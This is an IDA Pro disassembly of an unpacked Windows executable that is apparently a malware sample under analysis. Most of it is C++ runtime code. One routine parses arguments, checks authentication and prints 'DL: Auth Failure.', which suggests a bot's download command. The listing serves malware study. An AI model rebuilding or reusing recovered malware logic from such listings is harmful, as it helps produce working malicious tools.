;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 835220C85BCD135E223A47F9636067C3
; File Name : u:\work\835220c85bcd135e223a47f9636067c3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0001C000 ( 114688.)
; Section size in file : 0001C000 ( 114688.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_401141+79p
; sub_4011D3+25p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40333E
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40101C proc near ; CODE XREF: sub_4012AC+50p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_402F6C
mov eax, [ebp+arg_0]
add esp, 10h
pop ebp
retn
sub_40101C endp
; =============== S U B R O U T I N E =======================================
sub_401038 proc near ; DATA XREF: fabskl8p:00421D04o
mov dword ptr [ecx], offset off_41D324
jmp sub_403096
sub_401038 endp
; ---------------------------------------------------------------------------
loc_401043: ; DATA XREF: fabskl8p:off_41D324o
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D324
call sub_403096
test byte ptr [esp+8], 1
jz short loc_40105F
push esi
call sub_403339
pop ecx
loc_40105F: ; CODE XREF: .text:00401056j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_401065 proc near ; CODE XREF: sub_40121E+43p
; sub_4016BA+43p ...
push 4
mov eax, offset loc_41C93C
call sub_40497C
mov esi, ecx
mov [ebp-10h], esi
call sub_402FC7
and dword ptr [ebp-4], 0
push dword ptr [ebp+8]
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D330
call sub_401111
mov eax, esi
call sub_404A1B
retn 4
sub_401065 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40109A proc near ; CODE XREF: .text:004010C8p
; .text:004010E7j ...
push esi
mov esi, ecx
push 0
push 1
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D330
call sub_4011D3
mov ecx, esi
pop esi
jmp sub_403096
sub_40109A endp
; =============== S U B R O U T I N E =======================================
sub_4010B7 proc near ; DATA XREF: fabskl8p:0041D334o
; fabskl8p:0041D340o ...
cmp dword ptr [ecx+24h], 10h
jb short loc_4010C1
mov eax, [ecx+10h]
retn
; ---------------------------------------------------------------------------
loc_4010C1: ; CODE XREF: sub_4010B7+4j
lea eax, [ecx+10h]
retn
sub_4010B7 endp
; ---------------------------------------------------------------------------
loc_4010C5: ; DATA XREF: fabskl8p:off_41D330o
push esi
mov esi, ecx
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_4010DB
push esi
call sub_403339
pop ecx
loc_4010DB: ; CODE XREF: .text:004010D2j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_4010E1: ; DATA XREF: fabskl8p:00421CCCo
mov dword ptr [ecx], offset off_41D33C
jmp sub_40109A
; ---------------------------------------------------------------------------
loc_4010EC: ; DATA XREF: fabskl8p:off_41D33Co
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D33C
call sub_40109A
test byte ptr [esp+8], 1
jz short loc_401108
push esi
call sub_403339
pop ecx
loc_401108: ; CODE XREF: .text:004010FFj
mov eax, esi
pop esi
retn 4
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_25. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_401111 proc near ; CODE XREF: sub_401065+26p
; sub_4013E6+2Bp
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push 0FFFFFFFFh
push 0
push [esp+0Ch+arg_0]
mov ecx, esi
call sub_401141
mov eax, esi
pop esi
retn 4
sub_401111 endp
; ---------------------------------------------------------------------------
loc_401137: ; CODE XREF: .text:0041C8DEj
; .text:0041C95Aj ...
push 0
push 1
call sub_4011D3
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401111+1Bp
; sub_401547+2Bp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp [edi+14h], eax
mov ebx, ecx
jnb short loc_401159
call sub_402A85
loc_401159: ; CODE XREF: sub_401141+11j
mov esi, [edi+14h]
mov eax, [ebp+arg_4]
sub esi, eax
cmp [ebp+arg_8], esi
jnb short loc_401169
mov esi, [ebp+arg_8]
loc_401169: ; CODE XREF: sub_401141+23j
cmp ebx, edi
mov ecx, ebx
jnz short loc_401187
push 0FFFFFFFFh
add esi, eax
push esi
call sub_4012AC
push [ebp+arg_4]
mov ecx, ebx
push 0
call sub_4012AC
jmp short loc_4011CA
; ---------------------------------------------------------------------------
loc_401187: ; CODE XREF: sub_401141+2Cj
push 0
push esi
call sub_401337
test al, al
jz short loc_4011CA
cmp dword ptr [edi+18h], 10h
jb short loc_40119E
mov edi, [edi+4]
jmp short loc_4011A1
; ---------------------------------------------------------------------------
loc_40119E: ; CODE XREF: sub_401141+56j
add edi, 4
loc_4011A1: ; CODE XREF: sub_401141+5Bj
mov ecx, [ebx+18h]
cmp ecx, 10h
jb short loc_4011AE
mov eax, [ebx+4]
jmp short loc_4011B1
; ---------------------------------------------------------------------------
loc_4011AE: ; CODE XREF: sub_401141+66j
lea eax, [ebx+4]
loc_4011B1: ; CODE XREF: sub_401141+6Bj
mov edx, [ebp+arg_4]
push esi
add edi, edx
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push esi
mov ecx, ebx
call sub_40131B
loc_4011CA: ; CODE XREF: sub_401141+44j
; sub_401141+50j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 0Ch
sub_401141 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4011D3 proc near ; CODE XREF: sub_40109A+10p
; .text:0040113Bp ...
arg_0 = byte ptr 4
arg_4 = dword ptr 8
cmp [esp+arg_0], 0
push esi
mov esi, ecx
jz short loc_401208
cmp dword ptr [esi+18h], 10h
jb short loc_401208
cmp [esp+4+arg_4], 0
lea eax, [esi+4]
push edi
mov edi, [eax]
jbe short loc_401200
push [esp+8+arg_4]
push edi
push 10h
push eax
call sub_401000
add esp, 10h
loc_401200: ; CODE XREF: sub_4011D3+1Bj
push edi
call sub_403339
pop ecx
pop edi
loc_401208: ; CODE XREF: sub_4011D3+8j
; sub_4011D3+Ej
push [esp+4+arg_4]
mov ecx, esi
mov dword ptr [esi+18h], 0Fh
call sub_40131B
pop esi
retn 8
sub_4011D3 endp
; =============== S U B R O U T I N E =======================================
sub_40121E proc near ; CODE XREF: sub_41C283+4Ap
push 44h
mov eax, offset loc_41CA3C
call sub_40497C
push dword ptr [ebp+10h]
mov esi, [ebp+0Ch]
push dword ptr [esi+4]
push esi
call sub_401395
mov ecx, 0FC0FC0h
sub ecx, dword_4357B4
cmp ecx, 1
jnb short loc_40127B
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-28h]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421CC8
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D33C
call sub_40456B
loc_40127B: ; CODE XREF: sub_40121E+29j
inc dword_4357B4
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_404A1B
retn 0Ch
sub_40121E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401291 proc near ; CODE XREF: .text:0041CB2Bp
push 10Ch
call sub_403417
test eax, eax
pop ecx
jz short loc_4012A2
mov [eax], eax
loc_4012A2: ; CODE XREF: sub_401291+Dj
lea ecx, [eax+4]
test ecx, ecx
jz short locret_4012AB
mov [ecx], eax
locret_4012AB: ; CODE XREF: sub_401291+16j
retn
sub_401291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012AC proc near ; CODE XREF: sub_401141+33p
; sub_401141+3Fp
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
cmp [esi+14h], edi
jnb short loc_4012C0
call sub_402A85
loc_4012C0: ; CODE XREF: sub_4012AC+Dj
mov eax, [esi+14h]
sub eax, edi
cmp eax, [ebp+arg_4]
jnb short loc_4012CD
mov [ebp+arg_4], eax
loc_4012CD: ; CODE XREF: sub_4012AC+1Cj
cmp [ebp+arg_4], 0
jbe short loc_401313
mov ecx, [esi+18h]
cmp ecx, 10h
push ebx
lea edx, [esi+4]
jb short loc_4012E3
mov ebx, [edx]
jmp short loc_4012E5
; ---------------------------------------------------------------------------
loc_4012E3: ; CODE XREF: sub_4012AC+31j
mov ebx, edx
loc_4012E5: ; CODE XREF: sub_4012AC+35j
cmp ecx, 10h
jb short loc_4012EC
mov edx, [edx]
loc_4012EC: ; CODE XREF: sub_4012AC+3Cj
sub eax, [ebp+arg_4]
add ebx, edi
add ebx, [ebp+arg_4]
push eax
push ebx
sub ecx, edi
push ecx
add edx, edi
push edx
call sub_40101C
mov eax, [esi+14h]
sub eax, [ebp+arg_4]
add esp, 10h
push eax
mov ecx, esi
call sub_40131B
pop ebx
loc_401313: ; CODE XREF: sub_4012AC+25j
pop edi
mov eax, esi
pop esi
pop ebp
retn 8
sub_4012AC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40131B proc near ; CODE XREF: sub_401111+Cp
; sub_401141+84p ...
arg_0 = dword ptr 4
cmp dword ptr [ecx+18h], 10h
mov eax, [esp+arg_0]
mov [ecx+14h], eax
jb short loc_40132D
mov ecx, [ecx+4]
jmp short loc_401330
; ---------------------------------------------------------------------------
loc_40132D: ; CODE XREF: sub_40131B+Bj
add ecx, 4
loc_401330: ; CODE XREF: sub_40131B+10j
mov byte ptr [ecx+eax], 0
retn 4
sub_40131B endp
; =============== S U B R O U T I N E =======================================
sub_401337 proc near ; CODE XREF: sub_401141+49p
; sub_401547+39p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push esi
push edi
mov edi, [esp+8+arg_0]
cmp edi, 0FFFFFFFEh
mov esi, ecx
jbe short loc_401349
call sub_402A46
loc_401349: ; CODE XREF: sub_401337+Bj
cmp [esi+18h], edi
jnb short loc_40135B
push dword ptr [esi+14h]
mov ecx, esi
push edi
call sub_401442
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40135B: ; CODE XREF: sub_401337+15j
cmp [esp+8+arg_4], 0
jz short loc_40137C
cmp edi, 10h
jnb short loc_40137C
mov eax, [esi+14h]
cmp edi, eax
jnb short loc_401370
mov eax, edi
loc_401370: ; CODE XREF: sub_401337+35j
push eax
push 1
mov ecx, esi
call sub_4011D3
jmp short loc_401388
; ---------------------------------------------------------------------------
loc_40137C: ; CODE XREF: sub_401337+29j
; sub_401337+2Ej
test edi, edi
jnz short loc_401388
push edi
mov ecx, esi
call sub_40131B
loc_401388: ; CODE XREF: sub_401337+22j
; sub_401337+43j ...
xor eax, eax
cmp eax, edi
sbb eax, eax
pop edi
neg eax
pop esi
retn 8
sub_401337 endp
; =============== S U B R O U T I N E =======================================
sub_401395 proc near ; CODE XREF: sub_40121E+16p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 10Ch
call sub_403417
test eax, eax
pop ecx
jz short loc_4013AA
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_4013AA: ; CODE XREF: sub_401395+Dj
lea ecx, [eax+4]
test ecx, ecx
jz short loc_4013B7
mov edx, [esp+arg_4]
mov [ecx], edx
loc_4013B7: ; CODE XREF: sub_401395+1Aj
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_4013CA
push esi
mov esi, [esp+8+arg_8]
push 41h
pop ecx
rep movsd
pop esi
loc_4013CA: ; CODE XREF: sub_401395+28j
pop edi
retn 0Ch
sub_401395 endp
; ---------------------------------------------------------------------------
push esi
push dword ptr [esp+8]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D33C
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_4013E6 proc near ; CODE XREF: .text:004013D5p
; sub_402A85+46p
push 4
mov eax, offset loc_41C93C
call sub_40497C
mov esi, ecx
mov [ebp-10h], esi
mov edi, [ebp+8]
push edi
call sub_40303E
and dword ptr [ebp-4], 0
add edi, 0Ch
push edi
lea ecx, [esi+0Ch]
mov dword ptr [esi], offset off_41D330
call sub_401111
mov eax, esi
call sub_404A1B
retn 4
sub_4013E6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401420 proc near ; CODE XREF: sub_40121E+33p
; sub_4016BA+33p ...
arg_0 = dword ptr 4
push esi
mov esi, ecx
push 0
mov dword ptr [esi+18h], 0Fh
call sub_40131B
push [esp+4+arg_0]
mov ecx, esi
call sub_401524
mov eax, esi
pop esi
retn 4
sub_401420 endp
; =============== S U B R O U T I N E =======================================
sub_401442 proc near ; CODE XREF: sub_401337+1Dp
push 0Ch
mov eax, offset sub_41C919
call sub_4049AF
mov edi, ecx
mov [ebp-18h], edi
mov esi, [ebp+8]
or esi, 0Fh
cmp esi, 0FFFFFFFEh
jbe short loc_401463
mov esi, [ebp+8]
jmp short loc_401488
; ---------------------------------------------------------------------------
loc_401463: ; CODE XREF: sub_401442+1Aj
xor edx, edx
push 3
mov eax, esi
pop ebx
div ebx
mov ecx, [edi+18h]
mov [ebp-14h], ecx
shr dword ptr [ebp-14h], 1
mov edx, [ebp-14h]
cmp eax, edx
jnb short loc_401488
push 0FFFFFFFEh
pop eax
sub eax, edx
cmp ecx, eax
ja short loc_401488
lea esi, [edx+ecx]
loc_401488: ; CODE XREF: sub_401442+1Fj
; sub_401442+38j ...
and dword ptr [ebp-4], 0
lea eax, [esi+1]
push 0
push eax
call sub_4015ED
pop ecx
pop ecx
mov ebx, eax
jmp short loc_4014C7
; ---------------------------------------------------------------------------
loc_40149D: ; DATA XREF: fabskl8p:00421E24o
mov eax, [ebp+8]
mov [ebp-10h], esp
mov [ebp+8], eax
inc eax
push 0
push eax
mov byte ptr [ebp-4], 2
call sub_4015ED
pop ecx
mov [ebp-14h], eax
pop ecx
mov eax, offset loc_4014BE
retn
; ---------------------------------------------------------------------------
loc_4014BE: ; DATA XREF: sub_401442+76o
mov edi, [ebp-18h]
mov esi, [ebp+8]
mov ebx, [ebp-14h]
loc_4014C7: ; CODE XREF: sub_401442+59j
cmp dword ptr [ebp+0Ch], 0
jbe short loc_4014EC
cmp dword ptr [edi+18h], 10h
jb short loc_4014D8
mov eax, [edi+4]
jmp short loc_4014DB
; ---------------------------------------------------------------------------
loc_4014D8: ; CODE XREF: sub_401442+8Fj
lea eax, [edi+4]
loc_4014DB: ; CODE XREF: sub_401442+94j
push dword ptr [ebp+0Ch]
push eax
lea eax, [esi+1]
push eax
push ebx
call sub_401000
add esp, 10h
loc_4014EC: ; CODE XREF: sub_401442+89j
push 0
push 1
mov ecx, edi
call sub_4011D3
push dword ptr [ebp+0Ch]
mov ecx, edi
mov [edi+4], ebx
mov [edi+18h], esi
call sub_40131B
call sub_404A1B
retn 8
sub_401442 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40150F proc near ; DATA XREF: fabskl8p:00421E14o
mov ecx, [ebp-18h]
xor esi, esi
push esi
push 1
call sub_4011D3
push esi
push esi
call sub_40456B
int 3 ; Trap to Debugger
sub_40150F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401524 proc near ; CODE XREF: sub_401420+17p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
lea edx, [eax+1]
loc_40152E: ; CODE XREF: sub_401524+Fj
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40152E
sub eax, edx
push eax
push [esp+8+arg_0]
mov ecx, esi
call sub_401547
pop esi
retn 4
sub_401524 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401547 proc near ; CODE XREF: sub_401524+1Ap
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
push edi
mov esi, ecx
call sub_4015B9
test al, al
jz short loc_401579
cmp dword ptr [esi+18h], 10h
jb short loc_401566
mov eax, [esi+4]
jmp short loc_401569
; ---------------------------------------------------------------------------
loc_401566: ; CODE XREF: sub_401547+18j
lea eax, [esi+4]
loc_401569: ; CODE XREF: sub_401547+1Dj
push [ebp+arg_4]
sub edi, eax
push edi
push esi
mov ecx, esi
call sub_401141
jmp short loc_4015B3
; ---------------------------------------------------------------------------
loc_401579: ; CODE XREF: sub_401547+12j
push 0
push [ebp+arg_4]
mov ecx, esi
call sub_401337
test al, al
jz short loc_4015B1
mov ecx, [esi+18h]
cmp ecx, 10h
jb short loc_401596
mov eax, [esi+4]
jmp short loc_401599
; ---------------------------------------------------------------------------
loc_401596: ; CODE XREF: sub_401547+48j
lea eax, [esi+4]
loc_401599: ; CODE XREF: sub_401547+4Dj
push [ebp+arg_4]
push edi
push ecx
push eax
call sub_401000
add esp, 10h
push [ebp+arg_4]
mov ecx, esi
call sub_40131B
loc_4015B1: ; CODE XREF: sub_401547+40j
mov eax, esi
loc_4015B3: ; CODE XREF: sub_401547+30j
pop edi
pop esi
pop ebp
retn 8
sub_401547 endp
; =============== S U B R O U T I N E =======================================
sub_4015B9 proc near ; CODE XREF: sub_401547+Bp
arg_0 = dword ptr 4
push esi
mov esi, [ecx+18h]
cmp esi, 10h
lea eax, [ecx+4]
jb short loc_4015C9
mov edx, [eax]
jmp short loc_4015CB
; ---------------------------------------------------------------------------
loc_4015C9: ; CODE XREF: sub_4015B9+Aj
mov edx, eax
loc_4015CB: ; CODE XREF: sub_4015B9+Ej
cmp [esp+4+arg_0], edx
jb short loc_4015E7
cmp esi, 10h
jb short loc_4015D8
mov eax, [eax]
loc_4015D8: ; CODE XREF: sub_4015B9+1Bj
mov ecx, [ecx+14h]
add ecx, eax
cmp ecx, [esp+4+arg_0]
jbe short loc_4015E7
mov al, 1
jmp short loc_4015E9
; ---------------------------------------------------------------------------
loc_4015E7: ; CODE XREF: sub_4015B9+16j
; sub_4015B9+28j
xor al, al
loc_4015E9: ; CODE XREF: sub_4015B9+2Cj
pop esi
retn 4
sub_4015B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4015ED proc near ; CODE XREF: sub_401442+50p
; sub_401442+6Cp
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov ecx, [ebp+arg_0]
sub esp, 0Ch
test ecx, ecx
ja short loc_401605
xor ecx, ecx
loc_4015FC: ; CODE XREF: sub_4015ED+22j
push ecx
call sub_403417
pop ecx
leave
retn
; ---------------------------------------------------------------------------
loc_401605: ; CODE XREF: sub_4015ED+Bj
or eax, 0FFFFFFFFh
xor edx, edx
div ecx
cmp eax, 1
jnb short loc_4015FC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
call sub_402FD8
push offset dword_421D00
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D324
call sub_40456B
int 3 ; Trap to Debugger
push esi
push [esp+10h+var_8]
mov esi, ecx
call sub_40303E
mov dword ptr [esi], offset off_41D324
mov eax, esi
pop esi
retn 4
sub_4015ED endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40164F proc near ; CODE XREF: sub_401E4D+FFp
; sub_401FDA+4Ep ...
cmp dword ptr [esi], 0
jnz short loc_401659
call sub_403329
loc_401659: ; CODE XREF: sub_40164F+3j
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_401668
call sub_403329
loc_401668: ; CODE XREF: sub_40164F+12j
mov eax, [esi+4]
add eax, 8
retn
sub_40164F endp
; =============== S U B R O U T I N E =======================================
sub_40166F proc near ; CODE XREF: sub_401E4D+F1p
; sub_401FDA+40p ...
mov eax, [esi]
test eax, eax
jz short loc_401679
cmp eax, [edi]
jz short loc_40167E
loc_401679: ; CODE XREF: sub_40166F+4j
call sub_403329
loc_40167E: ; CODE XREF: sub_40166F+8j
mov eax, [esi+4]
xor ecx, ecx
cmp eax, [edi+4]
setnz cl
mov al, cl
retn
sub_40166F endp
; =============== S U B R O U T I N E =======================================
sub_40168C proc near ; CODE XREF: sub_401E4D+11Ap
; sub_401FDA+69p ...
cmp dword ptr [esi], 0
mov eax, [esi]
mov [edi], eax
mov eax, [esi+4]
mov [edi+4], eax
jnz short loc_4016A0
call sub_403329
loc_4016A0: ; CODE XREF: sub_40168C+Dj
mov eax, [esi]
mov ecx, [esi+4]
cmp ecx, [eax+4]
jnz short loc_4016AF
call sub_403329
loc_4016AF: ; CODE XREF: sub_40168C+1Cj
mov eax, [esi+4]
mov eax, [eax]
mov [esi+4], eax
mov eax, edi
retn
sub_40168C endp
; =============== S U B R O U T I N E =======================================
sub_4016BA proc near ; CODE XREF: sub_414887+54p
push 48h
mov eax, offset loc_41C95F
call sub_40497C
push dword ptr [ebp+8]
mov esi, [ebp+10h]
push dword ptr [esi+4]
push esi
call sub_401745
mov ecx, 3C3C3C3h
sub ecx, dword_4357C0
cmp ecx, 1
jnb short loc_401717
push offset aListTTooLong ; "list<T> too long"
lea ecx, [ebp-2Ch]
call sub_401420
and dword ptr [ebp-4], 0
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-54h]
call sub_401065
push offset dword_421CC8
lea eax, [ebp-54h]
push eax
mov dword ptr [ebp-54h], offset off_41D33C
call sub_40456B
loc_401717: ; CODE XREF: sub_4016BA+29j
inc dword_4357C0
mov [esi+4], eax
mov ecx, [eax+4]
mov [ecx], eax
call sub_404A1B
retn 0Ch
sub_4016BA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40172D proc near ; CODE XREF: .text:0041CB48p
push 4Ch
call sub_403417
test eax, eax
pop ecx
jz short loc_40173B
mov [eax], eax
loc_40173B: ; CODE XREF: sub_40172D+Aj
lea ecx, [eax+4]
test ecx, ecx
jz short locret_401744
mov [ecx], eax
locret_401744: ; CODE XREF: sub_40172D+13j
retn
sub_40172D endp
; =============== S U B R O U T I N E =======================================
sub_401745 proc near ; CODE XREF: sub_4016BA+16p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 4Ch
call sub_403417
test eax, eax
pop ecx
jz short loc_401757
mov ecx, [esp+arg_0]
mov [eax], ecx
loc_401757: ; CODE XREF: sub_401745+Aj
lea ecx, [eax+4]
test ecx, ecx
jz short loc_401764
mov edx, [esp+arg_4]
mov [ecx], edx
loc_401764: ; CODE XREF: sub_401745+17j
push edi
lea edi, [eax+8]
test edi, edi
jz short loc_401777
push esi
mov esi, [esp+8+arg_8]
push 11h
pop ecx
rep movsd
pop esi
loc_401777: ; CODE XREF: sub_401745+25j
pop edi
retn 0Ch
sub_401745 endp
; =============== S U B R O U T I N E =======================================
sub_40177B proc near ; DATA XREF: fabskl8p:off_420BC4o
push 4B8h
mov eax, offset loc_41CB03
call sub_4049E5
cmp dword ptr [ebp+1Ch], 3
mov eax, [ebp+10h]
mov edi, [ebp+20h]
mov [ebp-4C4h], eax
mov eax, [ebp+18h]
mov [ebp-4BCh], eax
mov [ebp-4C0h], edi
jl loc_4019D5
mov esi, 0BFh
xor ebx, ebx
push esi
lea eax, [ebp-18Fh]
push ebx
push eax
mov [ebp-190h], bl
call sub_407F20
push esi
lea eax, [ebp-0CFh]
push ebx
push eax
mov [ebp-0D0h], bl
call sub_407F20
push dword ptr [edi+4]
lea edi, [ebp-190h]
call sub_41BDFF
push 0C0h
lea esi, [ebp-0D0h]
mov ebx, offset dword_426C38
call sub_419F0A
add esp, 20h
cmp byte ptr [ebp+8], 0
jz short loc_401817
cmp byte_426C0A, 0
jz loc_4019EB
loc_401817: ; CODE XREF: sub_40177B+8Dj
lea ecx, [ebp-0D0h]
lea eax, [ebp-190h]
loc_401823: ; CODE XREF: sub_40177B+C0j
mov dl, [eax]
cmp dl, [ecx]
jnz short loc_401841
test dl, dl
jz short loc_40183D
mov dl, [eax+1]
cmp dl, [ecx+1]
jnz short loc_401841
inc eax
inc eax
inc ecx
inc ecx
test dl, dl
jnz short loc_401823
loc_40183D: ; CODE XREF: sub_40177B+B0j
xor eax, eax
jmp short loc_401846
; ---------------------------------------------------------------------------
loc_401841: ; CODE XREF: sub_40177B+ACj
; sub_40177B+B8j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401846: ; CODE XREF: sub_40177B+C4j
test eax, eax
jnz loc_4019C8
push 327h
push eax
lea eax, [ebp-4B8h]
push eax
call sub_407F20
push dword ptr [ebp-4BCh]
mov esi, offset dword_420B58
push esi
mov edi, 0FFh
lea eax, [ebp-4B8h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-4B8h]
add esp, 1Ch
lea ecx, [eax+1]
loc_40188A: ; CODE XREF: sub_40177B+114j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40188A
push dword ptr [ebp-4C4h]
sub eax, ecx
push esi
mov [ebp+eax-4B8h], dl
lea eax, [ebp-3B8h]
push 22h
push eax
call sub_402EBA
lea eax, [ebp-3B8h]
add esp, 10h
lea ecx, [eax+1]
loc_4018BB: ; CODE XREF: sub_40177B+145j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018BB
mov ebx, [ebp-4C0h]
push dword ptr [ebx+8]
sub eax, ecx
push esi
mov [ebp+eax-3B8h], dl
lea eax, [ebp-395h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-395h]
add esp, 10h
lea ecx, [eax+1]
loc_4018EE: ; CODE XREF: sub_40177B+178j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4018EE
push dword ptr [ebx+0Ch]
sub eax, ecx
push esi
mov [ebp+eax-395h], dl
lea eax, [ebp-295h]
push edi
push eax
call sub_402EBA
lea eax, [ebp-295h]
add esp, 10h
lea esi, [eax+1]
loc_40191B: ; CODE XREF: sub_40177B+1A5j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40191B
sub eax, esi
mov [ebp+eax-295h], cl
mov al, [ebp+8]
mov [ebp-192h], al
mov al, [ebp+0Ch]
push 4
mov [ebp-193h], al
pop eax
cmp [ebp+1Ch], eax
jl short loc_40198B
mov [ebp-4BCh], eax
loc_40194B: ; CODE XREF: sub_40177B+203j
mov eax, [ebx+eax*4]
push 3
mov edi, offset dword_420B5C
mov esi, eax
pop ecx
xor edx, edx
repe cmpsb
jz short loc_401982
mov esi, eax
push 2
mov edi, offset dword_420B60
pop ecx
xor eax, eax
repe cmpsb
jz short loc_401982
mov eax, [ebp-4BCh]
inc eax
cmp eax, [ebp+1Ch]
mov [ebp-4BCh], eax
jle short loc_40194B
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_40177B+1E1j
; sub_40177B+1F1j
mov byte ptr [ebp-195h], 1
jmp short loc_401992
; ---------------------------------------------------------------------------
loc_40198B: ; CODE XREF: sub_40177B+1C8j
mov byte ptr [ebp-195h], 0
loc_401992: ; CODE XREF: sub_40177B+205j
; sub_40177B+20Ej
push 8
mov byte ptr [ebp-194h], 0
call sub_403417
pop ecx
mov [ebp-4C0h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_4019EB
push offset sub_41BF2B
lea ecx, [ebp-4B8h]
mov edi, offset dword_420B64
mov esi, eax
call sub_414887
jmp short loc_4019EB
; ---------------------------------------------------------------------------
loc_4019C8: ; CODE XREF: sub_40177B+CDj
push offset aDlAuthFailure_ ; "DL: Auth Failure."
push dword ptr [ebp-4BCh]
jmp short loc_4019DB
; ---------------------------------------------------------------------------
loc_4019D5: ; CODE XREF: sub_40177B+2Ej
push offset aDlInvalidArgum ; "DL: Invalid Arguments"
push eax
loc_4019DB: ; CODE XREF: sub_40177B+258j
push dword ptr [ebp+0Ch]
push offset dword_42851C
call sub_417B51
add esp, 10h
loc_4019EB: ; CODE XREF: sub_40177B+96j
; sub_40177B+232j ...
call sub_404A2F
retn 1Ch
sub_40177B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
